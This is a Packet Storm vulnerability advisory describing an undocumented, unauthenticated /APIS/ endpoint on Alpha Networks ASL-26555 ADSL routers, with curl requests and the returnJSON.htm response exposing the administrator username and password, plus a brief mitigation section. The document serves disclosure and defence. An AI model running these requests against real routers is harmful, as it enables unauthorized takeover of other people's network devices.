what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure

Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure
Posted Aug 17, 2012
Authored by Alberto Ortega

Alpha Networks ADSL2/2+ Wireless Router version ASL-26555 suffers from a remote administration password disclosure vulnerability. Tested on firmware version 2.0.0.30B_ES.

tags | exploit, remote
SHA-256 | 0acc750576387e5c5c8428df81f18e8f0e01592d9d5308c8ea0f94e991b8de78

Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure

Change Mirror Download

- Title:

Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Remote Administration Password Disclosure

- Author:

Alberto Ortega @a0rtega
alberto[@]pentbox[.]net

- Version:

Tested on firmware version v2.0.0.30B_ES.
Laboratory subject: http://a0rtega.pentbox.net/files/asl-26555-zombie.jpg

- Summary:

Alpha Networks ADSL Wireless Routers have an administration web panel
to manage the device configuration.

To access the panel, the administrator has to visit the IP of the device using
the port 8000 with a web browser. It will prompt for authentication.

$ curl http://192.168.1.1:8000/SETUP/sp_home.htm
<title>401 Not Authorized</title>
<h1>401 Not Authorized</h1>

$ curl -I http://192.168.1.1:8000/SETUP/sp_home.htm
HTTP/1.1 401 Not Authorized
Server: LocalAccess
Date: Thu, 16 Aug 2012 18:23:08 GMT
WWW-Authenticate: Basic realm="ASL-26555"

- The vulnerability:

If we investigate the directory /APIS/ in the same web server we will have a fully usable
API to grab information from the device.

This API doesn't seem to be documented anywhere, quite weird (backdoor?).

Also, this API doesn't require authentication and grant us administrator access.

The implemented calls to the API are:

returnWifiJSON.htm returnInterfacesJSON.txt
returnWelcomeInfoJSON.htm returnFirewallLevelJSON.txt
returnUsbJSON.htm returnFirewallJSON.txt
returnServicesJSON.txt returnDhcpList.htm
returnPasswordJSON.htm returnDevicesJSON.htm
returnLoginStatusJSON.htm returnApplicationsListJSON.htm
returnLoginJSON.txt returnApplicationsJSON.htm
returnJSON.htm returnApplicationJSON.txt
returnIpJSON.txt returnInternetJSON.htm

We can read all the configuration from the device without authentication. In addition, we have
a call named returnJSON.htm that returns us the credentials of the administrator user:

$ curl -I http://192.168.1.1:8000/APIS/returnJSON.htm
HTTP/1.1 200 OK
Server: LocalAccess
Date: Thu, 16 Aug 2012 18:29:50 GMT
Transfer-Encoding: chunked
Content-Type: text/html

$ curl http://192.168.1.1:8000/APIS/returnJSON.htm
{
"RETURN":{
"success": true,
"errorDescription": "ERROR_GENERAL"
},
"USER":{
"USERNAME": "admin",
"PASSWORD": "adm1n_passw0rd_exposed"
}
}

This credentials can be used to log into the web panel with the administrator account.

- Mitigation:

The only possible mitigation is to drop access to everyone from the outside
with a network level blocking configuration.
This can be done in the Advanced configuration of the device.

You can also turn off the web panel, but you won't be able to manage the device.

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close